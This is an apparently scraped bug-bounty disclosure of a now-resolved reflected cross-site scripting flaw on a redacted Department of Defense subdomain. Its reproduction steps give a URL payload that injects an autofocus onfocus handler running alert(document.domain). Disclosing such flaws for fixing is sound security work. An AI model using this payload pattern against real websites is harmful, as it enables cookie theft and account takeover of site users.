Loading HuntDB...

Reflected XSS at https://████████/███/...

Medium
U
U.S. Dept Of Defense
Submitted None
Reported by pudsec

Vulnerability Details

Technical details and impact analysis

Cross-site Scripting (XSS) - Reflected
## Summary: According to [DOD Websites](https://www.defense.gov/Resources/Military-Departments/DOD-Websites/), the [███████](http://██████████) is a potential in-scope target, and where I discovered an unauthenticated `GET` based reflected cross-site scripting vulnerability on the `██████████` subdomain. ## Steps to Reproduce: Visit the following URL; ``` https://█████/█████/████████=%22%20autofocus%20onfocus=%22alert(document.domain)%22&Z_MODE=&Z_CALLER_URL=&Z_FORMROW=&Z_LONG_LIST=&Z_ISSUE_WAIT= ``` The following generated in the page source; ``` ███████ VALUE="" autofocus onfocus="alert(document.domain)"%"> ``` You will see that a pop-up appears, demonstrating that the JavaScript was executed successfully. ## Recommendations: Sanitise any user input and check any other potential vulnerable parameters. ## Impact A cross-site scripting vulnerability allows an attacker to embed malicious code into a URL of a vulnerable page, which is then executed when a victim views the page and can be used to gain account credentials by stealing cookies or modify the destination page to perform malicious actions.

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Submitted

Weakness

Cross-site Scripting (XSS) - Reflected